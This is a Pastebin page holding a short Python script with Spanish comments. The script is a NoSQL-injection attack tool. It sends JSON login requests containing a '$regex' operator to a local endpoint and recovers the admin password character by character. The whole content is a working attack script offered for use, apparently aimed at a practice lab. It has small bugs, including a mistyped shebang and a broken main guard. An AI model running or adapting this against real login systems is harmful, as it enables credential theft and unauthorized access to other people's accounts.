Advertisement
vic_npc

NoSQL-password-force brute

May 27th, 2023 (edited)
98
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.09 KB | Cybersecurity | 0 0
  1. #!/use/bin/python3
  2.  
  3. from pwn import *
  4. import requests, time, sys, signal, string
  5.  
  6. def def_handler(sig, frame):
  7.     print("\n\n[!] Saliendo...\n")
  8.     sys.exit(1)
  9.  
  10. # Ctrl+C
  11. signal.signal(signal.SIGINT, def_handler)
  12.  
  13. # Variables globales
  14. login_url = "http://localhost:4000/user/login"
  15. characters = string.ascii_lowercase + string.ascii_uppercase + string.digits
  16.  
  17. def makeNoSQLI():
  18.     password = ""
  19.  
  20.     p1 = log.progress("Fuerza bruta")
  21.     p1.status("Iniciando proceso de fuerza bruta")
  22.    
  23.     time.sleep(2)
  24.  
  25.     p2 = log.progress("Password")
  26.  
  27.     for position in range(0, 24):
  28.         for character in characters:
  29.             post_data = '{"username":"admin","password":{"$regex":"^%s%s"}}' % (password, character)
  30.  
  31.             p1.status(post_data)
  32.  
  33.             headers = {'Content-Type': 'application/json'}
  34.  
  35.             r = requests.post(login_url, headers=headers, data=post_data)
  36.  
  37.             if "Logged in as user" in r.text:
  38.                 password += character
  39.                 p2.status(password)
  40.                 break
  41.  
  42. if _name_ == '_main_':
  43.     makeNoSQLI()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement